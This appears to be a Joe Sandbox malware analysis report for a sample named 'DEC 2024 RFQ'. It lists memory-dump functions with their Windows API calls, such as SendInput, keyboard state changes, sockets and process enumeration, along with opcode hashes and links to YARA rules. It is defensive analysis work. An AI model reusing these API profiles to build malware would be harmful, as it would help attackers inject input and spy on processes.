                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 314563124-0
                                                                                                                      • Opcode ID: 6d39748456af2a2a0318d379a9525729241fd6816f59d16f3c70ee20c57761d1
                                                                                                                      • Instruction ID: 80857824b3ce2ae67946fa496a8eed301344905ef7eba0dac35d5c60db25eb77
                                                                                                                      • Opcode Fuzzy Hash: 6d39748456af2a2a0318d379a9525729241fd6816f59d16f3c70ee20c57761d1
                                                                                                                      • Instruction Fuzzy Hash: DE812B75E00109EFCB04DFA4C984EEEB7B9FF89355F208558E509AB250DB75AE06CB60
                                                                                                                      Function 0007687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2808897238-0
                                                                                                                      • Opcode ID: 04e55d49ba32d90d7180064e6f43a560045006a027271d22013876c166b494d2
                                                                                                                      • Instruction ID: c29fb11be491d452416f816f6531f004b138592dbe13514d35a85e0626a1ab81
                                                                                                                      • Opcode Fuzzy Hash: 04e55d49ba32d90d7180064e6f43a560045006a027271d22013876c166b494d2
                                                                                                                      • Instruction Fuzzy Hash: 8B51C774E00B01AADB60AF65D89167EB3E5AF45310F20C81FE58FD7292DB39D840CB19
                                                                                                                      Function 000A97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(016FD890,?), ref: 000A9863
                                                                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 000A9896
                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 000A9903
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3880355969-0
                                                                                                                      • Opcode ID: fb7b3005007181ae0b434a2714fba0115cf3b639056bb79fb5e67d4a77b56c28
                                                                                                                      • Instruction ID: a16f8856331d8fb3c56573bfb9d888141657ed4f335095a0a928bd13218a93e6
                                                                                                                      • Opcode Fuzzy Hash: fb7b3005007181ae0b434a2714fba0115cf3b639056bb79fb5e67d4a77b56c28
                                                                                                                      • Instruction Fuzzy Hash: 1B515F34A00609EFDF10CFA8C980AAE7BF5FF46360F148559F955AB2A0DB34AD41CB90
                                                                                                                      Function 00079A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00079AD2
                                                                                                                      • __itow.LIBCMT ref: 00079B03
                                                                                                                        • Part of subcall function 00079D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00079DBE
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00079B6C
                                                                                                                      • __itow.LIBCMT ref: 00079BC3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3379773720-0
                                                                                                                      • Opcode ID: db4f07b34ad24f4a67a562a9090d748c375aaf1275ab8837dd5a3161107250a6
                                                                                                                      • Instruction ID: 7bca956d1cb1b8e93184224bdb0c9e75365b0fbb3d6c10a41fdff001338eefcb
                                                                                                                      • Opcode Fuzzy Hash: db4f07b34ad24f4a67a562a9090d748c375aaf1275ab8837dd5a3161107250a6
                                                                                                                      • Instruction Fuzzy Hash: D7419D74A00218ABDF21EF64D846FEE7BB9EF45710F004069F909A7292DB749A44CBA5
                                                                                                                      Function 000969AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 000969D1
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 000969E1
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00096A45
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00096A51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2214342067-0
                                                                                                                      • Opcode ID: 779b26d606b4b6a86cbf1a7c71d6d6d694538bcd96778c1b1261c7367e538bfe
                                                                                                                      • Instruction ID: 93fcaf1c9cde59245adf2956c984af8e28bca0bd8b41d26670d87c23a3be3185
                                                                                                                      • Opcode Fuzzy Hash: 779b26d606b4b6a86cbf1a7c71d6d6d694538bcd96778c1b1261c7367e538bfe
                                                                                                                      • Instruction Fuzzy Hash: 9E41AE75740210AFEB60AF64DC86FBE77E8AF05B14F44C058FA59AB2C3DA759D008B91
                                                                                                                      Function 0009641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,000AF910), ref: 000964A7
                                                                                                                      • _strlen.LIBCMT ref: 000964D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4218353326-0
                                                                                                                      • Opcode ID: f1b2531db1a9bb740bd59363a768f03e1048f87f92167722bfdd4545f1958692
                                                                                                                      • Instruction ID: 8e024129dad1baf7225539136f208f9920c65dc172a292f38a18c809fa931cd3
                                                                                                                      • Opcode Fuzzy Hash: f1b2531db1a9bb740bd59363a768f03e1048f87f92167722bfdd4545f1958692
                                                                                                                      • Instruction Fuzzy Hash: B741DF71A00514ABCF14EBA8EC95FFEB7A8AF05310F108165F81A9B293EB31ED04DB54
                                                                                                                      Function 0008B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0008B89E
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0008B8C4
                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0008B8E9
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0008B915
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: 743e61343ceb8d29e0b910fb12d5d880dd5637b9131b74e0054f7a9392fa2fc0
                                                                                                                      • Instruction ID: 4def26d77c1a7a86fecf8581cf0d8316e9f290fc223529ad69722da0b90d82fc
                                                                                                                      • Opcode Fuzzy Hash: 743e61343ceb8d29e0b910fb12d5d880dd5637b9131b74e0054f7a9392fa2fc0
                                                                                                                      • Instruction Fuzzy Hash: 2B411839600A21DFCB11EF55D584A9DBBE1BF4A710F198099EC8A9B362CB34FD01CB95
                                                                                                                      Function 000A8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000A88DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 5d60aa7a6572b136123efe1d3879286582f3bbc8df6f8aadd4a3f15276b215db
                                                                                                                      • Instruction ID: 3ab42ee9f4dca06c331eb5b6bd96547ab97c2f3046bdce607b0fcf7f855446ec
                                                                                                                      • Opcode Fuzzy Hash: 5d60aa7a6572b136123efe1d3879286582f3bbc8df6f8aadd4a3f15276b215db
                                                                                                                      • Instruction Fuzzy Hash: BF31D234600109BFEB709AE8CC85BFE77B5EB07310F688512FA51E61A1CE74D9409752
                                                                                                                      Function 000AAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000AAB60
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000AABD6
                                                                                                                      • PtInRect.USER32(?,?,000AC014), ref: 000AABE6
                                                                                                                      • MessageBeep.USER32(00000000), ref: 000AAC57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: e53813992ae3f88ac8fe821cdebdc85958c57e018bc9c6643938c24ced5585b4
                                                                                                                      • Instruction ID: ea2184cf661c148388b770fc25a85c70b3bacfb3a74b78a28476cae86a0d7cbc
                                                                                                                      • Opcode Fuzzy Hash: e53813992ae3f88ac8fe821cdebdc85958c57e018bc9c6643938c24ced5585b4
                                                                                                                      • Instruction Fuzzy Hash: CD418230700519DFEB21DF98C884BA97BF5FB4B721F1484A9E415AF2A1D731E841CB92
                                                                                                                      Function 00080AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00080B27
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00080B43
                                                                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00080BA9
                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00080BFB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 6491b6d43091a765c4b771c7bdf08d9ccefa893360e632e17b2a1fb88e3b5500
                                                                                                                      • Instruction ID: 897d141c1320ff0c1f7b454ef6b9cc9a9a41ebbedcb2f0331a454c78c6e08fa7
                                                                                                                      • Opcode Fuzzy Hash: 6491b6d43091a765c4b771c7bdf08d9ccefa893360e632e17b2a1fb88e3b5500
                                                                                                                      • Instruction Fuzzy Hash: 4E315830E40618AFFFB0AB658C05BFEBBE9BF45328F08826AE5D0521D1C37989489755
                                                                                                                      Function 00080C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00080C66
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00080C82
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00080CE1
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00080D33
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 648007844425a600df1e6eeecbc3047d8d96ee486d8acd7ce04e297757578b4e
                                                                                                                      • Instruction ID: b4face45b8d6768f961757be05625bdb9383b51d44033e1fbe7897b3a2b4e3e6
                                                                                                                      • Opcode Fuzzy Hash: 648007844425a600df1e6eeecbc3047d8d96ee486d8acd7ce04e297757578b4e
                                                                                                                      • Instruction Fuzzy Hash: 00312630D40718AEFFB0AFA5C8157FEBBA6BB45320F04832AE4C5521D1D37999598792
                                                                                                                      Function 000561C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000561FB
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00056229
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00056257
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0005628D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: bc95bb96ed839ba3eedd9ef4cda9972d1b21cc298436285dbcfc8daee6096cbf
                                                                                                                      • Instruction ID: 0e07b2e3b35ea3c91349efba117c044ec33c5294e47a0a47054e468f72ca4978
                                                                                                                      • Opcode Fuzzy Hash: bc95bb96ed839ba3eedd9ef4cda9972d1b21cc298436285dbcfc8daee6096cbf
                                                                                                                      • Instruction Fuzzy Hash: 0631CE30604A46AFDF218FA5CC44BBB7BE9FF42352F554128EC64871A1DB32E954DB90
                                                                                                                      Function 000A4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 000A4F02
                                                                                                                        • Part of subcall function 00083641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008365B
                                                                                                                        • Part of subcall function 00083641: GetCurrentThreadId.KERNEL32 ref: 00083662
                                                                                                                        • Part of subcall function 00083641: AttachThreadInput.USER32(00000000,?,00085005), ref: 00083669
                                                                                                                      • GetCaretPos.USER32(?), ref: 000A4F13
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 000A4F4E
                                                                                                                      • GetForegroundWindow.USER32 ref: 000A4F54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: 245c40ee300cff9cba4b9bb9a4e27f00453ee4e3cb4b870913f26db802123197
                                                                                                                      • Instruction ID: ca3718cac66bfd4e2dd3f4ac20d0ba97dfe63e7800c034a2ffec64309fc301d7
                                                                                                                      • Opcode Fuzzy Hash: 245c40ee300cff9cba4b9bb9a4e27f00453ee4e3cb4b870913f26db802123197
                                                                                                                      • Instruction Fuzzy Hash: 49313E71D00118AFDB00EFB5D8859EFB7F9EF89300F10446AE415E7202EA759E058BA0
                                                                                                                      Function 00083C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00083C7A
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00083C88
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00083CA8
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00083D52
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: 987a6f8701bf7d92b21c0ad9e425e89426ba8e61457854d5a70de30c5c34bde1
                                                                                                                      • Instruction ID: dbce60baec52dc4066188a517bb66b5e3783d6ccd3f0b357572ff8a19f5d3fd5
                                                                                                                      • Opcode Fuzzy Hash: 987a6f8701bf7d92b21c0ad9e425e89426ba8e61457854d5a70de30c5c34bde1
                                                                                                                      • Instruction Fuzzy Hash: B8318D711083059FD310EF50E885ABFBBE8BF95354F50082DF4C5861A2EB719A49CB92
                                                                                                                      Function 000AC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • GetCursorPos.USER32(?), ref: 000AC4D2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0005B9AB,?,?,?,?,?), ref: 000AC4E7
                                                                                                                      • GetCursorPos.USER32(?), ref: 000AC534
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0005B9AB,?,?,?), ref: 000AC56E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: f9bb497b79f01ff423faef5b684e323a50458c45e219d848b0dd5c947a6d9387
                                                                                                                      • Instruction ID: 30cdb499f7a654fae2591facf7b75889ce9dab86a16bd4ed91f815de6b12d6a7
                                                                                                                      • Opcode Fuzzy Hash: f9bb497b79f01ff423faef5b684e323a50458c45e219d848b0dd5c947a6d9387
                                                                                                                      • Instruction Fuzzy Hash: 8E31C535900858EFEB258FA8C858DFA7BF5EF0A710F054055F9059B261C7356D50DB94
